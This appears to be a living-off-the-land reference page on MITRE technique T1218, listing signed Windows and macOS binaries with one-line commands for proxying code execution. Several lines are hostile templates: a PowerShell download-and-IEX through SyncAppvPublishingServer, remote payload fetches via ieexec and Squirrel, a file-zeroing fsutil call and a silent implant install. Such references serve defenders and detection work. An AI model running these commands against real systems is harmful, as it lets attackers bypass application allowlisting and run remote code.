T1218: System Binary Proxy Execution
Adversaries may bypass process and application-whitelisting mechanisms by proxying execution of malicious code with signed, trusted binaries.
Living-off-the-Land Matrix for T1218
Across 93 verified binariesmshta.exe
Microsoft HTML Application (MSHTA) host executes .hta files and scripts embedded inside web pages. Attackers abuse mshta to execute malicious inline VBScript or JScript directly from the command line or remote HTTP servers.
rundll32.exe
The Rundll32 program loads and runs 32-bit and 64-bit Dynamic Link Libraries (DLLs). Threat actors use it to execute exported functions from arbitrary DLLs, run scriptlets, or execute code via MSHTML protocol handlers.
regsvr32.exe
Regsvr32 registers and unregisters OLE controls, such as DLLs and ActiveX controls in the Windows Registry. When passed the /i switch pointing to an HTTP/HTTPS URL and scrobj.dll, regsvr32 downloads and executes remote COM scriptlets in memory (the classic Squiblydoo technique).
AddinUtil.exe
.NET Tool used for updating cache files for Microsoft Office Add-Ins.
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe -AddinRoot:.Atbroker.exe
Helper binary for Assistive Technology (AT)
ATBroker.exe /start malwareBash.exe
File used by Windows subsystem for Linux
bash.exe -c "{CMD}"CertOC.exe
Used for installing certificates
certoc.exe -LoadDLL {PATH_ABSOLUTE:.dll}Change.exe
Remote Desktop Services MultiUser Change Utility
change.exe userCmstp.exe
Installs or removes a Connection Manager service profile.
Control.exe
Binary used to launch controlpanel items in Windows
CustomShellHost.exe
A host process that is used by custom shells when using Windows in Kiosk mode.
CustomShellHost.exeExtexport.exe
Load a DLL located in the c:\test folder with a specific name.
Extexport.exe {PATH_ABSOLUTE:folder} foo barFsutil.exe
File System Utility
fsutil.exe file setZeroData offset=0 length=9999999999 {PATH_ABSOLUTE}Gpscript.exe
Used by group policy to process scripts
Gpscript /logonIe4uinit.exe
Executes commands from a specially prepared ie4uinit.inf file.
ie4uinit.exe -BaseSettingsiediagcmd.exe
Diagnostics Utility for Internet Explorer
set windir=c:\test& cd "C:\Program Files\Internet Explorer\" & iediagcmd.exe /out:{PATH_ABSOLUTE:.cab}Ieexec.exe
The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.
ieexec.exe {REMOTEURL:.exe}Infdefaultinstall.exe
Binary used to perform installation based on content inside inf files
InfDefaultInstall.exe {PATH:.inf}Installutil.exe
The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies
Mmc.exe
Load snap-ins to locally and remotely manage Windows systems
Msconfig.exe
MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows
Msconfig.exe -5Msdt.exe
Microsoft diagnostics tool
msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af {PATH_ABSOLUTE:.xml} /skip TRUEmsedgewebview2.exe
msedgewebview2.exe is the executable file for Microsoft Edge WebView2, which is a web browser control used by applications to display web content.
Odbcconf.exe
Used in Windows for managing ODBC connections
OfflineScannerShell.exe
Windows Defender Offline Shell
OfflineScannerShellPcwrun.exe
Program Compatibility Wizard
Pcwrun.exe {PATH_ABSOLUTE:.exe}Presentationhost.exe
File is used for executing Browser applications
Presentationhost.exe {PATH_ABSOLUTE:.xbap}Provlaunch.exe
Launcher process
provlaunch.exe LOLBinQuery.exe
Remote Desktop Services MultiUser Query Utility
query.exe userRasautou.exe
Windows Remote Access Dialer
rasautou -d {PATH:.dll} -p export_name -a a -e eRegister-cimprovider.exe
Used to register new wmi providers
Register-cimprovider -path {PATH_ABSOLUTE:.dll}Regsvcs.exe
Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies
Reset.exe
Remote Desktop Services Reset Utility
reset.exe sessionRunexehelper.exe
Launcher process
runexehelper.exe {PATH_ABSOLUTE:.exe}Runonce.exe
Executes a Run Once Task that has been configured in the registry
Runonce.exe /AlternateShellStartupRunscripthelper.exe
Execute target PowerShell script
runscripthelper.exe surfacecheck \\?\{PATH_ABSOLUTE:.txt} {PATH_ABSOLUTE:folder}scp.exe
Used for uploading or downloading files over SSH.
scp.exe -o ProxyCommand="{CMD}" . localhost:.Scriptrunner.exe
Execute binary through proxy binary to evade defensive counter measures
Scriptrunner.exe -appvscript {PATH:.exe}Setres.exe
Configures display settings
setres.exe -w 800 -h 600SettingSyncHost.exe
Host Process for Setting Synchronization
SettingSyncHost -LoadAndRunDiagScript {PATH:.exe}setupugc.exe
Setup Unattend Generic Command Processor used during Windows deployment.
setupugc.exe specializeSigverif.exe
File Signature Verification utility to verify digital signatures of files
sigverif.exeStordiag.exe
Storage diagnostic tool
stordiag.exeSyncAppvPublishingServer.exe
Used by App-v to get App-v server lists
SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('{REMOTEURL:.ps1}') | IEX"Verclsid.exe
Used to verify a COM object before it is instantiated by Windows Explorer
Wab.exe
Windows address book manager
wab.exeWorkFolders.exe
Work Folders
WorkFolderswuauclt.exe
Windows Update Client
wuauclt.exe /UpdateDeploymentProvider {PATH_ABSOLUTE:.dll} /RunHandlerComServerXwizard.exe
Execute custom class that has been added to the registry or download a file with Xwizard.exe
xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}Advpack.dll
Utility for installing software and drivers with rundll32.exe
Ieadvpack.dll
INF installer for Internet Explorer. Has much of the same functionality as advpack.dll.
Ieframe.dll
Internet Browser DLL for translating HTML code.
Setupapi.dll
Windows Setup Application Programming Interface
AccCheckConsole.exe
Verifies UI accessibility requirements
AccCheckConsole.exe -window "Untitled - Notepad" {PATH_ABSOLUTE:.dll}AgentExecutor.exe
Intune Management Extension included on Intune Managed Devices
AgentExecutor.exe -powershell "{PATH_ABSOLUTE:.ps1}" "{PATH_ABSOLUTE:.1.log}" "{PATH_ABSOLUTE:.2.log}" "{PATH_ABSOLUTE:.3.log}" 60000 "C:\Windows\SysWOW64\WindowsPowerShell\v1.0" 0 1AppCert.exe
Windows App Certification Kit command-line tool.
Appvlp.exe
Application Virtualization Utility Included with Microsoft Office 2016
AppVLP.exe {PATH_SMB:.bat}Bginfo.exe
Background Information Utility included with SysInternals Suite
bginfo.exe {PATH:.bgi} /popup /nolicpromptcoregen.exe
Binary coregen.exe (Microsoft CoreCLR Native Image Generator) loads exported function GetCLRRuntimeHost from coreclr.dll or from .DLL in arbitrary path. Coregen is located within "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\" or another version of Silverlight. Coregen is signed by Microsoft and bundled with Microsoft Silverlight.
coregen.exe /L {PATH_ABSOLUTE:.dll} dummy_assembly_nameDefaultPack.EXE
This binary can be downloaded along side multiple software downloads on the Microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider.
DefaultPack.EXE /C:"{CMD}"Dotnet.exe
dotnet.exe comes with .NET Framework
dotnet.exe {PATH:.dll}Mscopilot_proxy.exe
Microsoft Copilot proxy launcher
Msdeploy.exe
Microsoft tool used to deploy Web Applications.
msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="{PATH_ABSOLUTE:.bat}"Sqlps.exe
Tool included with Microsoft SQL Server that loads SQL Server cmdlets. Microsoft SQL Server\100 and 110 are Powershell v2. Microsoft SQL Server\120 and 130 are Powershell version 4. Replaced by SQLToolsPS.exe in SQL Server 2016, but will be included with installation for compatability reasons.
Sqlps.exe -noprofileSQLToolsPS.exe
Tool included with Microsoft SQL that loads SQL Server cmdlts. A replacement for sqlps.exe. Successor to sqlps.exe in SQL Server 2016+.
SQLToolsPS.exe -noprofile -command Start-Process {PATH:.exe}Squirrel.exe
Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
squirrel.exe --download {REMOTEURL}Teams.exe
Electron runtime binary which runs the Teams application
Update.exe
Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
Update.exe --download {REMOTEURL}VisualUiaVerifyNative.exe
A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls.
VisualUiaVerifyNative.exeVSIISExeLauncher.exe
Binary will execute specified binary. Part of VS/VScode installation.
VSIISExeLauncher.exe -p {PATH:.exe} -a "{CMD:args}"vsls-agent.exe
Agent for Visual Studio Live Share (Code Collaboration)
vsls-agent.exe --agentExtensionPath {PATH_ABSOLUTE:.dll}Wsl.exe
Windows subsystem for Linux executable
wsl.exe -e /mnt/c/Windows/System32/calc.exeopen
The open command opens files, directories, URLs, and applications as if you double-clicked them in Finder. Used to launch unsigned or quarantined applications and evade Gatekeeper or security software inspection.
open -a /Applications/Safari.app/Contents/MacOS/Safari http://phishing.sitepkgutil
Pkgutil queries and extracts installer packages. Attackers use pkgutil --expand to decompress package payloads and extract scripts without triggering installation gatekeeper checks.
pkgutil --expand /tmp/installer.pkg /tmp/extracted_pkginstaller
Installer runs system software installations. Attackers run installer from terminal with root privileges to deploy malicious package files silently without user prompts.
sudo installer -pkg /tmp/implant.pkg -target /hdiutil
Hdiutil manipulates macOS disk images (DMG). Attackers attach downloaded DMG images silently (-nobrowse) to access and execute stage-2 payloads without mounting icons on the desktop.
hdiutil attach /tmp/payload.dmg -nobrowse -mountpoint /Volumes/secret